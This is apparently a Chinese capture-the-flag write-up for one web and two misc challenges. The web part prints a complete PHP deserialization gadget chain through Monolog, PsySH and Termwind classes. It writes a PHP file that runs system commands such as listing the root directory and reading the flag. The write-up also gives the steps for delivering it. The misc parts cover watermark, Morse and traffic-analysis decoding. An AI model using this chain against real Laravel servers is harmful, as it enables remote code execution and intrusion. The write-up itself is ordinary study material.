又是当town in go的一次。

不过这次算不算我web ak了(总共4题,我睡一觉起来没了3道,莫名其妙ak了)

做过来感觉misc的图片隐写还是博大精深,遇到两张jpg图片,未知隐写强如怪物,拼尽全力也无法战胜,花了一个下午的时间填充我的妙妙小工具还是没有弄出来。

在这里致谢一下我传奇的密码手,一人2k分带我们杀进了前50,膜拜。

web

ezLaravel-ucsc

由题目可知,是laravel漏洞,通过dirsearch扫描出题目源码,百度查询以后找到**https://xz.aliyun.com/news/14564 **,浏览后写出payload如下:

``

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
<?php
namespace Termwind\ValueObjects{
Class Styles{
private array $textModifiers;
private array $properties;
public function __construct(){
$this->textModifiers = ["file_put_contents"];
$this->properties = ["styles"=>"<?php system('ls /'); ?>", "parentStyles"=>0];
}
}
}
namespace Termwind\Components{
use Termwind\ValueObjects\Styles;
abstract Class Element{
protected string $content;
protected Styles $styles;
public function __construct()
{
$this->content = 'testtesttest.php';
$this->styles = new Styles();
}
}
Class Hr extends Element{}
}
namespace Psy\Readline\Hoa{
use Termwind\Components\Hr;

abstract Class Stream{
protected $_bucket;
public function __construct(){
$this->_bucket = [new Hr()];
}
}
Class FileRead extends Stream {}
}

namespace Monolog\Handler{
use Psy\Readline\Hoa\FileRead;
Class GroupHandler{
protected array $handlers;
public function __construct(){
$this->handlers = [new FileRead()];
}
}
}

namespace {
$obj = new Monolog\Handler\GroupHandler();
echo base64_encode(serialize($obj));
}

将生成的payload通过get传参str访问/public/index.php后再访问/public/testtesttest.php,找到文件flag.sh,图片

将上述代码的system(‘ls /‘)改为system(‘cat /flag.sh’),再次生成payload传参后发现了flag.php地址,图片

访问/var/www/html/flag.php得到结果。

MISC

three-ucsc

下载附件,发现是三个附件,先解part1,发现是java盲水印,用B神工具直接还原。图片

解part2,打开文件后发现是2进制字符串,bintool解密得图片

LS4uLi4tIC0uLS4gLiAtLS0uLiAtLS0tLiAtLi4uLi0gLi4uLi0gLS4uIC0uLi4uIC0uLi4gLS4uLi4tIC0tLS4uIC4uLi0tIC0tLS0tIC4gLS4uLi4t

base64解密得***-….- -.-. . —.. —-. -….- ….- -.. -…. -… -….- —.. …– —– . -….-***

摩斯密码解密得到part2:-CE89-4D6B-830E-

解密part3,发现是需要流量分析得到压缩包的密码。

上CTF-NetA一把梭图片

找到可疑包,用wireshark追踪得到misc4

经过尝试发现密码是thinkbell,解压得到part3:5d0cb5695077

最终连接得到flag:flag{8f02d3e7-ce89-4d68-830e-5d0cb5695077}

USB-ucsc

流量分析,上CTF-NetA一把梭misc5

得到flag:flag{ebdfea9b-3469-41c7-9070-d7833ecc610}